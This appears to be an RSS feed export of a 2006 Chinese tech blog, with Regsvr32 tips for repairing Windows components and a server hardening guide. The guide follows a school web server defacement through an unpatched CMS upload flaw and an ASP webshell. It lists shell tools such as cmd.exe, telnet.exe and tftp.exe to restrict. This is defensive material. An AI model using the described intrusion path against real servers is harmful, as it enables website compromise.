<?xml version="1.0" encoding="GB2312"?>  
<rss version="2.0" 
xmlns:dc="http://purl.org/dc/elements/1.1/" 
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
xmlns:admin="http://webns.net/mvcb/" 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> 
  
<channel> 
<title><![CDATA[MaxGO Inside]]></title> 
<link>http://maxgo.bokee.com/index.html</link> 
<description><![CDATA[<div align="center"><script type="text/javascript"><!--
google_ad_client = "pub-8766835781551246";
google_ad_width = 120;
google_ad_height = 60;
google_ad_format = "120x60_as_rimg";
google_cpa_choice = "CAAQ06KdzgEaCOnXets5xDAJKLHM93M";
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></div>]]></description> 
<dc:language>zh-cn</dc:language> 
<dc:creator>MaxGO@yeah.net</dc:creator> 
<dc:date>2006-10-19T16:26:47Z</dc:date> 
<admin:generatorAgent rdf:resource="http://blog.bokee.com.com" /> 

<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772629.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p><p />]]></description> 
<guid isPermaLink="false">5772629@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:26:47Z</dc:date> 
</item> 
<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772628.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p><p />]]></description> 
<guid isPermaLink="false">5772628@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:26:37Z</dc:date> 
</item> 
<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772627.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p><p />]]></description> 
<guid isPermaLink="false">5772627@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:26:36Z</dc:date> 
</item> 
<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772625.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p><p>&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;&amp;lt;!--<br />google_ad_client = &amp;quot;pub-8766835781551246&amp;quot;;<br />google_alternate_color = &amp;quot;FFFFFF&amp;quot;;<br />google_ad_width = 200;<br />google_ad_height = 200;<br />google_ad_format = &amp;quot;200x200_as&amp;quot;;<br />google_ad_type = &amp;quot;text_image&amp;quot;;<br />//2006-10-19: blogchina<br />google_ad_channel = &amp;quot;8032535915&amp;quot;;<br />google_color_border = &amp;quot;FFFFFF&amp;quot;;<br />google_color_bg = &amp;quot;FFFFFF&amp;quot;;<br />google_color_link = &amp;quot;74C7FB&amp;quot;;<br />google_color_text = &amp;quot;434343&amp;quot;;<br />google_color_url = &amp;quot;85C329&amp;quot;;<br />//--&amp;gt;&amp;lt;/script&amp;gt;<br />&amp;lt;script type=&amp;quot;text/javascript&amp;quot;<br />&amp;nbsp; src=&amp;quot;<a href="http://pagead2.googlesyndication.com/pagead/show_ads.js">http://pagead2.googlesyndication.com/pagead/show_ads.js</a>&amp;quot;&amp;gt;<br />&amp;lt;/script&amp;gt;</p>]]></description> 
<guid isPermaLink="false">5772625@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:26:26Z</dc:date> 
</item> 
<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772623.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p><p>&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;&amp;lt;!--<br />google_ad_client = &amp;quot;pub-8766835781551246&amp;quot;;<br />google_alternate_color = &amp;quot;FFFFFF&amp;quot;;<br />google_ad_width = 200;<br />google_ad_height = 200;<br />google_ad_format = &amp;quot;200x200_as&amp;quot;;<br />google_ad_type = &amp;quot;text_image&amp;quot;;<br />//2006-10-19: blogchina<br />google_ad_channel = &amp;quot;8032535915&amp;quot;;<br />google_color_border = &amp;quot;FFFFFF&amp;quot;;<br />google_color_bg = &amp;quot;FFFFFF&amp;quot;;<br />google_color_link = &amp;quot;74C7FB&amp;quot;;<br />google_color_text = &amp;quot;434343&amp;quot;;<br />google_color_url = &amp;quot;85C329&amp;quot;;<br />//--&amp;gt;&amp;lt;/script&amp;gt;<br />&amp;lt;script type=&amp;quot;text/javascript&amp;quot;<br />&amp;nbsp; src=&amp;quot;<a href="http://pagead2.googlesyndication.com/pagead/show_ads.js">http://pagead2.googlesyndication.com/pagead/show_ads.js</a>&amp;quot;&amp;gt;<br />&amp;lt;/script&amp;gt;</p>]]></description> 
<guid isPermaLink="false">5772623@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:26:06Z</dc:date> 
</item> 
<item> 
<title><![CDATA[MaxGO Inside 转入全新域名]]></title> 
<link>http://maxgo.bokee.com/5772621.html</link> 
<description><![CDATA[<p><a href="http://www.maxgo.cn/">http://www.maxgo.cn/</a></p>]]></description> 
<guid isPermaLink="false">5772621@http://maxgo.bokee.com/</guid> 
<dc:subject>网络知识</dc:subject> 
<dc:date>2006-10-19T16:25:46Z</dc:date> 
</item> 
<item> 
<title><![CDATA[文件Regsvr32用法及情况介绍]]></title> 
<link>http://maxgo.bokee.com/2392327.html</link> 
<description><![CDATA[<h5 class="diaryTitle" /><div class="diaryContent" id="diary771228" style="DISPLAY: block"><p>&amp;nbsp; &amp;nbsp;一、regsvr32的用法为：<br />　　“regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。 </p><p>　　参数有如下意义： </p><p>　　/u——反注册控件 </p><p>　　/s——不管注册成功与否，均不显示提示框 </p><p>　　/c——控制台输出 </p><p>　　/i——跳过控件的选项进行安装(与注册不同) </p><p>　　/n——不注册控件，此选项必须与/i选项一起使用 </p><p>&amp;nbsp; &amp;nbsp;执行该命令的方法： </p><p>1、可以在“开始”--“运行”，调出运行的对话框，也可以使用Win+R热键，然后直接在输入栏输入即可<br />2、在开始--运行 输入cmd，调出‘命令提示符’窗口，然后再执行regsvr32命令。<br />&amp;nbsp;<br />&amp;nbsp; &amp;nbsp;二、Regsvr32错误消息的说明<br />&amp;nbsp; &amp;nbsp;当使用 Regsvr32.exe 时，它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功，Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败，Regsvr32.exe 会返回一条错误消息，其中可能会包括一个 Win32 错误代码。 </p><p>&amp;nbsp; &amp;nbsp;以下列表介绍了 RegSvr32 错误消息和可能的原因。 &amp;nbsp; </p><p>Unrecognized flag:/invalid_flag </p><p>键入的标志或开关组合无效（请参阅本文中的“Regsvr32.exe 的用法”一节）。 &amp;nbsp; </p><p>No DLL name specified. </p><p>未包括 .dll 文件名（请参阅本文中的“Regsvr32.exe 的用法”一节）。 &amp;nbsp; </p><p>Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found. </p><p>Dllname 不是 .dll 或 .ocx 文件。例如，键入 regsvr32 wjview.exe 就会生成该错误消息。 &amp;nbsp; </p><p>Dllname is not an executable file and no registration helper is registered for this file type. </p><p>Dllname 不是可执行文件（.exe、.dll 或 .ocx）。例如，键入 regsvr32 autoexec.bat 就会生成该错误消息。 </p><p>Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found. </p><p>Dllname 可能未导出，或者内存中可能有损坏的 Dllname 版本。请考虑使用 Pview 来检测该文件并删除它。 &amp;nbsp; </p><p>Dllname is not self-registerable or a corrupted version is in memory. </p><p>例如，键入 regsvr32 icwdial.dll 后就会返回该错误消息，因为 Icwdial.dll 文件不能自行注册。 </p><p>如果您怀疑内存中有损坏的 Dllname 版本，请尝试重新启动计算机，或重新提取该文件的原始版本。 </p><p>如果您运行的是 Windows NT，可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息，请单击以查看以下 Microsoft 知识库文章： &amp;nbsp;197155 如何终止孤立进程 &amp;nbsp;<br />OleInitialize failed (or OleUninitialize failed). </p><p>Regsvr32 必须先初始化 COM 库，然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。 </p><p>如果对 COM 库进行初始化或撤消初始化的尝试失败，就会出现这些错误消息。例如，Ole32.dll 文件 </p><p>可能已经损坏，或者其版本有误。 &amp;nbsp; </p><p>LoadLibrary(&amp;quot;Dllname&amp;quot;) failed.GetlastError returns 0x00000485 </p><p>在 Winerror.h 中，0x00000485 = 1157 (ERROR_DLL_NOT_FOUND)，表示“找不到运行该应用程序所需的某个库文件”。例如，键入 regsvr32 missing.dll 后，如果找不到 Missing.dll 文件，就会返回该错误消息。 &amp;nbsp; </p><p>LoadLibrary(&amp;quot;Dllname&amp;quot;) failed.GetLastError returns 0x00000002 </p><p>在 Winerror.h 中，0x00000002 = 2 (ERROR_FILE_NOT_FOUND)，表示“系统找不到指定的文件”。换言之，系统找不到相关的 DLL。例如，如果键入 regsvr32 icwdial.dll，而此时缺少 Tapi32.dll（依赖项），就会返回该错误消息。 &amp;nbsp; </p><p>LoadLibrary(&amp;quot;dskmaint.dll&amp;quot;) failed.GetLastError returns 0x000001f 在 Winerror.h 中，0x000001f = 31 (ERROR_GEN_FAILURE)，表示“附加到系统上的设备不能正常工作”。如果您尝试注册 Win16 .dll 文件，就会发生此现象。例如，键入 regsvr32 dskmaint.dll 会返回该错误消息。 &amp;nbsp; </p><p>DllRegisterServer (or DllUnregisterServer)in Dllname failed.返回代码是：字符串 </p><p>在 Winerror.h 中搜索字符串。 &amp;nbsp;<br />Regsvr32.exe 和依赖项 <br />RegSvr32.exe 依赖于 Kernel32.dll、User32.dll 和 Ole32.dll 文件（在 Windows NT 中，还依赖于 Msvcrt.dll 和 Advapi32.dll 文件）。Regsvr32.exe 会加载您尝试注册或撤消注册的文件及其所有依赖项。如果缺少必需的文件或者它们已损坏，该进程可能会失败。 &amp;nbsp; </p><p>您可以使用 Depends.exe 来确定您尝试注册或撤消注册的文件的依赖项。在 Microsoft Windows 98 资源工具包 和 Microsoft Windows NT 4.0 资源工具包 支持工具中都提供了 Depends.exe。 <br />247024 Tools Included with the Microsoft Windows 98 Resource Kit </p><p>&amp;nbsp; &amp;nbsp;三、一个快速注册 DLL 及 OCX 的方法 </p><p>注意看罗！方法如下： </p><p>1、在资源管理器中找到 C:\Windows\System\Regsvr32.exe 并【复制】 ( 按鼠标右键选复制 )<br />2、将目录移到 C:\Windows\SendTo 后，执行【贴上快捷方式】 ( 按鼠标右键选贴上快捷方式 )<br />3、将快捷方式名称改成【REGISTER】<br />4、OK </p><p>现在，如果您想替某一个文件做注册动作，例如：C:\Windows\System\Test.ocx，您只要打开资源管理器，找到 C:\Windows\System\Test.ocx，按鼠标右键选【传送到】【REGISTER】即可完成注册动作了！ </p><p>注：有一个地方要注意的是，Regsvr32.exe 只能注册 32 位的文件！如果要用它来注册 16 位的文件，会有错误讯息产生。<br />一、轻松修复IE浏览器 </p><p>regsvr32 Shdocvw.dll <br />regsvr32 Oleaut32.dll <br />regsvr32 Actxprxy.dll <br />regsvr32 Mshtml.dll <br />regsvr32 Urlmon.dll </p><p>作用：<br />1、同时运行以上命令不仅可以解决IE不能打开新的窗口，用鼠标点击超链接也没有任何反应的问题；<br />2、还能解决大大小小的其它IE问题，比如网页显示不完整，JAVA效果不出现，网页不自动跳转，打开某些网站时总提示‘无法显示该页’等。 </p><p>二、解决Windows无法在线升级的问题 </p><p>regsvr32 wupdinfo.dll </p><p>作用：<br />Windows的漏洞很多，每隔一段时间就需要使用“Windows Update”升级程序进行在线升级，不过“Windows Update”经常出现无法使用的情况，这时，我们可以使用Regsvr32来解决这个问题。 </p><p>三、防范网络脚本病毒有新招 </p><p>regsvr32 /u scrrun.dll </p><p>作用：<br />网络脚本病毒嵌在网页中，上网时在不知不觉中机器就会感染上这种病毒。笔者认为单纯使用杀毒软件并不能有效地防范这些脚本病毒，必须从病毒传播的机理入手。网络脚本病毒的复制、传播都离不开FSO对象（File System Object，文件系统对象），因此禁用FSO对象就能有效地控制脚本病毒的传播。<br />如果需要使用FSO对象，键入“regsvr32 scrrun.dll”命令即可。 </p><p>四、卸载Win XP自带的ZIP功能 </p><p>regsvr32 /u zipfldr.dll </p><p>作用：<br />Win XP以功能强大而著称，但有些功能却常常令人有“鸡肋”之感，比如Win XP自带的ZIP功能和图片预览功能，不仅占用了系统资源，功能也远不如第三方软件强大。其实用Regsvr32命令可以很容易地卸载这些功能。 </p><p>五、修复无法缩略图查看文件问题 </p><p>2000: 开始→运行，输入regsvr32 C:＼Winnt＼System32＼thumbvw.dll<br />XP: &amp;nbsp; &amp;nbsp;开始→运行，输入regsvr32 shimgvw.dll </p><p>六、让WMP播放器支持RM格式 </p><p>　　很多朋友喜欢用Windows Media Player（以下简称WMP）播放器，但是它不支持RM格式，难道非得安装其它播放软件吗?笔者有办法。 </p><p>　　以Win XP为例，首先下载一个RM格式插件，解压缩后得到两个文件夹： Release（用于Windows 9x）和Release Unicode （用于Windows 2000/XP）；将Release Unicode文件夹下的RealMediaSplitter.ax文件拷贝到“系统盘符\WINDOWS\System32\”目录下；在“开始→运行”中键入“regsvr32 RealMediaSplitter.ax”，点击“确定”即可。接着下载解码器，如Real Alternative，安装后就能用WMP播放RM格式的影音文件了。 </p><p>七、让WMP9的播放器出现 </p><p>有些音乐网页的在线点歌需要用到Media Player，有的朋友明明安装了WMP9，但在线听音乐却只看到枯燥的WMP6播放器面板，想让漂亮的WMP9面板出现，当然没问题的。 </p><p>常见问题的操作系统多数WIN 98，先关闭IE，再在“开始→运行”中键入“regsvr32 wmpdxm.dll”，点击“确定”即可。 </p><p>八、解决打开系统功能时无反应 </p><p>regsvr32 shdocvw.dll </p><p>作用：<br />有时从开始菜单里点击XP系统的搜索功能、帮助和支持或管理工具等，但就是无任何反应，这是它们的打开方式缺少关联，所以我们只要用regsvr32注册它们需要调用的动态连接库文件就行了。 </p><p>九、添加/删除程序打不开了 </p><p>regsvr32 appwiz.cpl <br />regsvr32 mshtml.dll <br />regsvr32 jscript.dll <br />regsvr32 msi.dll <br />regsvr32 c:\program files\common files\system\ole db\oledb32.dll <br />regsvr32 c:\program files\common files\system\ado\msado15.dll <br />regsvr32 mshtmled.dll <br />regsvr32 /i shdocvw.dll<br />regsvr32 /i shell32.dll</p></div><div class="entity"><h5 class="diaryTitle"><img class="imgShow" onclick="function anonymous()
{
function anonymous()
{
function anonymous()
{
{if((document.getElementById('diary771206')).style.display=='none') {(document.getElementById('diary771206')).style.display='block'; this.src='http://www.blogdriver.com/template/common/img/array.gif'} else {(document.getElementById('diary771206')).style.display='none'; this.src='http://www.blogdriver.com/template/common/img/array_2.gif'}}
}
}
}" src="http://www.blogdriver.com/template/common/img/array.gif" /> 添加\删除程序”打不开 </h5><div class="diaryContent" id="diary771206" style="DISPLAY: block"><p>用记事本打开这个文件，然后对里面的内容修改可以使“添加\删除程序”发生一些变化：删除该文件中的部分“,hide”后，可以在“添加\删除Windows组件对话框”显示所希望看到的项目；如果删除了所有的“,hide”，就会出现“添加\删除程序”打不开的现象。你可以把其他电脑上的sysoc.inf和自己的sysoc.inf对比一下，把之前删除的一些“,hide”添加上去。 </p><p>或 Copy相同的覆盖掉。</p><p /><p>或是</p><p>一些动态库破坏了 重新注册了一下 <br />在命令提示行依次执行下列命令： <br /><br />regsvr32 appwiz.cpl <br />regsvr32 mshtml.dll <br />regsvr32 jscript.dll <br />regsvr32 msi.dll <br />regsvr32 c:\program files\common files\system\ole db\oledb32.dll <br />regsvr32 c:\program files\common files\system\ado\msado15.dll <br />regsvr32 mshtmled.dll <br />regsvr32 /i shdocvw.dll<br />regsvr32 /i shell32.dll</p></div><p class="diaryFoot" /></div><div class="entity"><h5 class="diaryTitle"><img class="imgShow" onclick="function anonymous()
{
function anonymous()
{
function anonymous()
{
{if((document.getElementById('diary759843')).style.display=='none') {(document.getElementById('diary759843')).style.display='block'; this.src='http://www.blogdriver.com/template/common/img/array.gif'} else {(document.getElementById('diary759843')).style.display='none'; this.src='http://www.blogdriver.com/template/common/img/array_2.gif'}}
}
}
}" src="http://www.blogdriver.com/template/common/img/array.gif" /> ASP 网页无法运行另类方法 </h5><div class="diaryContent" id="diary759843" style="DISPLAY: block"><p>在开始---运行中重新注册这些组件：&amp;nbsp;<i>&amp;nbsp;</i></p><p>regsvr32<i>&amp;nbsp;actxprxy.dll<i>&amp;nbsp;<i>&amp;nbsp;<i>&amp;nbsp;，</i></i></i></i></p><p>regsvr32<i>&amp;nbsp;shdocvw.dll，</i></p><p>regsvr32<i>&amp;nbsp;mshtml.dll，</i></p><p>regsvr32<i>&amp;nbsp;urlmon.dll，</i></p><p>regsvr32<i>&amp;nbsp;msjava.dll，</i></p><p>regsvr32<i>&amp;nbsp;browseui.dll，</i></p><p>regsvr32<i>&amp;nbsp;oleaut32.dll，</i></p><p>regsvr32<i>&amp;nbsp;shell32.dll，</i></p><p>然后重新启动下系统</p></div></div>]]></description> 
<guid isPermaLink="false">2392327@http://maxgo.bokee.com/</guid> 
<dc:subject>系统知识</dc:subject> 
<dc:date>2005-07-26T14:42:25Z</dc:date> 
</item> 
<item> 
<title><![CDATA[来吧,朋友们,让我们的Windows2003 拒绝海洋顶端并支持FSO]]></title> 
<link>http://maxgo.bokee.com/2066920.html</link> 
<description><![CDATA[<p><span style="FONT-SIZE: 12px">前言，我们院作了一个web服务器是专门给大学各个社团所开，前些日子服务器上几乎所有的网站首页都被修改，同学中有人&amp;nbsp; 惊呼，哇噻！谁干的真牛叉，我晕~~~在我看来这是迟早要发生的事，而且入侵过程及其简单，没看服务器之前就想过只有两种可能性，一是有人把服务器密码泄露出去了；二是，通过网站本身的漏洞（呵呵，服务器是我配置的）但我没有进行iis具体权限的设置。我N年前就给老师反映过了，社团的那帮菜安全意识极差，只会用现成的东东，这样下去迟早会出问题，老师当时没听进去，我也就没管那么多了。出问题后，我仔细研究了日志文件和所上传文件的日期，发现有个海洋顶端2006在3月份就已经传至服务器，不过没有做任何改动，汗一个~~~大概是这位大哥忘了，前些日子又费劲心思找了半天的网站漏洞，我看了看，这位四川XX大学的仁兄喜欢夜间作业，而且是连夜，真是有hacker精神。好了，不废话了，先从他的入侵经过讲起：该仁兄是从放置在服务器上的其中的一个社团网站进入的，该网站采用的是动易的3.X版本，据我所了解，没有打补丁，上传也是打开的，我没猜错的话他就是通过动易的漏洞上传了木马(呵呵，他这里上传的是桂林老兵的站长助手)，然后通站长助手找到了其他的网站目录，从而该服务器上的社团网站们进行修改。<br />事后，老师说将FSO禁用掉就万事大吉，我看不然，更何况有许多站点没有FSO的支持就无法运行。<br />那么，怎么做才能防止asp木马在您服务器上的恶意破坏？我查阅了n多资料后，总结了一个比较完善的解决方法。在这里，我以海洋顶端2006为例，来简单介绍一下怎样设置才能严防asp木马。</span></p><p><span style="FONT-SIZE: 12px"><span style="FONT-SIZE: 12px">我</span>装了一台Windows2003企业版，未打sp1补丁。<br />如下图所示：<br />采用默认设置，将海洋顶端2006放至web目录下,运行海洋顶端木马如图可以看出，在系统默认设置下，所有的操作都可用，也就是只要入侵者通过某种途径取得了webshell,那么采用海洋顶端木马就可以修改和删除web服务器的里面的绝大部分文件，甚至提升权限。<br />我们来看看海洋顶端都有一些什么操作，大家看第6，7，8，9项，通过他们就可以运行服务器上的程序和修改文件。FSO我们先不管，我们先来卸载WScript.Shell, Shell.application<br />这两个组件。<br />选开始-----运行&amp;nbsp;&amp;nbsp;<br />regsvr32 /u WSHom.Ocx&amp;nbsp; &amp;nbsp; <br />regsvr32 /u shell32.dll<br />也可以设置为禁止guests用户组访问，然后将访问web目录的默认账户设为guests组<br />cacls %systemroot%\system32\shell32.dll /e /d guests<br />如果提示无法删除文件正在使用，请先停用iis删除相关进程，然后再进行删除<br />当然还可以将这些组建改名，但要记得需要改两个地方。<br />1.WScript.Shell组件修改方法 <br />HKEY_CLASSES_ROOT\WScript.Shell\ <br />及 <br />HKEY_CLASSES_ROOT\WScript.Shell.1\ <br />改名为其它的名字，如：改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName <br />自己以后调用的时候使用这个就可以正常调用此组件了 <br />也要将clsid值也改一下 <br />HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值 <br />HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值 <br />2. <br />Shell.Application组件修改方法 <br />HKEY_CLASSES_ROOT\Shell.Application\ <br />及 <br />HKEY_CLASSES_ROOT\Shell.Application.1\ <br />改名为其它的名字，如：改为Shell.Application_ChangeName或Shell.Application.1_ChangeName <br />自己以后调用的时候使用这个就可以正常调用此组件了 <br />也要将clsid值也改一下 <br />HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值 <br />HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值<br />这样，就可以防止木马文件调用这些组建了。<br />为了进一步的安全，我们还可以把 %systemroot%\system32 下的net.exe,cmd.exe,ftp.exe,tftp.exe,telnet.exe 等设为只允许administrator访问。<br />磁盘权限&amp;nbsp;&amp;nbsp;<br />提示：如果权限设置出错，可以采用微软的secedit 工具来恢复默认<br />首先，将所有磁盘上的everyone用户去掉。系统盘其他用户保持默认，其他盘就留system和administrator就可以了，装有服务软件的文件夹具体权限还需另外设置。<br />然后，给每个web站点一个默认匿名访问账户，同时给与其相对应的虚拟目录文件夹相应的权限。<br />网上关于这方面的设置比较多，暂时借用天之骄子的。他的是在2000下设置的，这方面2003大体相同，但在，文件夹权限方面是不同的，切记切记~~~运行asp的默认权限，我会在附录中给出。<br />我们给用户建一个本地目录，也就是用户的网站的根目录我们就建到F:\8660.net<br /><br />到控制面版----管理工具---服务器管理--本地用户或组---用户----新增USER_8660.net的用户<br /><br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/@9zc_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/@9zc_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /> <br />选择USER_8660.net用户--属性---修改隶属于改成gusets组<br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/jg_m_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/jg_m_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /> <br />给用户的文件夹F:\8660.net分配权限（USER_8660.NET是控制改用户的来宾帐号 ASPNET 由于服务器上支持。NET所以也要把ASPNET帐户的权限给他，否则执行ASP。NET将权限不够）。<br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/2yp6_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/2yp6_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /><br />把USER_8660.NET 和ASPNET的帐号的权限都设置成如下（记住一定不要把完全控制的权限分配给用户）<br /><br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/@9zb_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/@9zb_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /> <br />然后我们建立IIS指向到该用户的目录<br />打开IIS---新建 WEB站点--- <br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/li!o_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/li!o_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /><br />[img] <img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/da6h_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/da6h_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" />[/img]<br />选择WEB服务器（8660.NET）--属性--- 目录安全性<br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/li!o_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/li!o_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /> <br />----匿名访问和验证控制---编辑<br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/jg_m_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/jg_m_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /><br />匿名访问---编辑<br /><img onmousewheel="function anonymous()
{
function anonymous()
{
return imgzoom(this);
}
}" onmouseover="function anonymous()
{
function anonymous()
{
if(this.resized) this.style.cursor='hand';
}
}" onclick="function anonymous()
{
function anonymous()
{
if(!this.resized) {return true;} else {window.open('http://www.8660.net/blog/attachments/month_0506/3zr7_20056258439.jpg');}
}
}" src="http://www.8660.net/blog/attachments/month_0506/3zr7_20056258439.jpg" onload="function anonymous()
{
function anonymous()
{
if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}
}
}" border="0" /><br />选择USER_8660.NET用户名作为访问此站点的用户帐号<br /><br /><br />至此，即使有人取得了一个网站的webshell，也只能对该网站进行修改（活该，谁叫你有洞），并不能造成跨站攻击了，呵呵~~~<br /><br />附录一：<br />我们安装软件的权限设置：<br />c:\Program Files\LIWEIWENSOFT<br />Everyone 读取和运行，列出文件夹目录，读取<br />administrators 全部<br />IIS_WPG 读取和运行，列出文件夹目录，读取<br /><br /><br />c:\Program Files\Dimac(如果有这个目录)<br />Everyone 读取和运行，列出文件夹目录，读取<br />administrators 全部<br /><br />c:\Program Files\ComPlus Applications (如果有)<br />administrators 全部<br /><br />c:\Program Files\GflSDK (如果有)<br />administrators 全部<br />Creator owner<br />不是继承的<br />只有子文件夹及文件<br />完全<br />Power Users<br />修改，读取和运行，列出文件夹目录，读取，写入<br />system 全部<br />TERMINAL SERVER Users<br />修改，读取和运行，列出文件夹目录，读取，写入<br />Users 读取和运行，列出文件夹目录，读取<br />Everyone 读取和运行，列出文件夹目录，读取<br /><br />c:\Program Files\InstallShield Installation Information (如果有)<br />c:\Program Files\Internet Explorer (如果有)<br />c:\Program Files\NetMeeting (如果有)<br />administrators 全部<br /><br />附录二：<br />IIS 6.0所需要的默认权限<br />NTFS permissions <br />Directory Users\Groups Permissions <br />%windir%\help\iishelp\common Administrators Full 